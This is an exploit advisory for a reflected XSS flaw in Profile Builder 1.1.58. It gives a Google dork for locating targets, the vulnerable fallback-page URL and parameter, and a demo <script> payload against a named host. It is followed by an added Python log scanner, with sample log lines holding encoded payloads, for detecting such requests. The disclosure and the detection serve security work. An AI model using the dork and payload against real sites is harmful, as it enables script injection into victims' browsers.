
WordPress plugin Profile Builder 1.1.58 XSS

Author: NULLpOint7r, Published: 17-02-2015
# Exploit Title: Wordpress plugin Profile Builder 1.1.58 XSS
# Exploit Author: NULLpOint7r
# Contact me: seidbenseidok@gmail.com
# Home: http://www.sec4ever.com/home/
# Date: 2015-02-16
# Dork: inurl:/wp-content/plugins/profile-builder/
# Version: 1.1.58
# Download link: https://downloads.wordpress.org/plugin/profile-builder.1.1.58.zip

exploit:
http://127.0.0.1/wp-content/plugins/profile-builder/assets/misc/wppb.fallback.page.php?message=[XSS]

demo:
http://bug-bounty.com/wp-content/plugins/profile-builder/assets/misc/wppb.fallback.page.php?message=<script>alert(/this is XSS/)</script>

pOc: http://s4.postimg.org/nga0n0tp9/p_Oc.png
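
Detection example, added here and not part of the original advisory or the plugin's code: a Python check that scans web server access logs for requests to the fallback page named above whose message parameter carries HTML markup. The Combined Log Format, the function names and the sample log lines are assumptions; only the path and the parameter name come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter name are taken from the advisory; everything else is assumed.
TARGET_PATH = "/wp-content/plugins/profile-builder/assets/misc/wppb.fallback.page.php"
PARAM = "message"
# Deliberately broad: characters that let a reflected value turn into markup.
MARKUP = re.compile(r"[<>\"']")
# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so a value encoded
    more than once is still inspected in its final form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (client_ip, decoded_message) for requests to the fallback
    page whose message parameter contains HTML metacharacters."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # endswith() also covers WordPress installed in a subdirectory.
        if not url.path.lower().endswith(TARGET_PATH):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            msg = decode_fully(raw)  # parse_qs has already decoded once
            if MARKUP.search(msg):
                hits.append((line.split(" ", 1)[0], msg))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Feb/2015:10:00:01 +0000] "GET ' + TARGET_PATH + '?message=%3Cscript%3Ealert(/this%20is%20XSS/)%3C/script%3E HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [17/Feb/2015:10:00:05 +0000] "GET ' + TARGET_PATH + '?message=Profile+updated HTTP/1.1" 200 498 "-" "-"',
    '198.51.100.7 - - [17/Feb/2015:10:01:12 +0000] "GET /blog' + TARGET_PATH + '?message=%253Cscript%253E HTTP/1.1" 200 470 "-" "-"',
    '192.0.2.12 - - [17/Feb/2015:10:02:30 +0000] "GET /index.php?message=%3Cb%3E HTTP/1.1" 200 901 "-" "-"',
]

if __name__ == "__main__":
    for ip, msg in suspicious_requests(SAMPLE_LOG):
        print(ip, repr(msg))
```

A hit shows only that markup was sent to the page; whether it was reflected unescaped depends on the installed plugin version.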
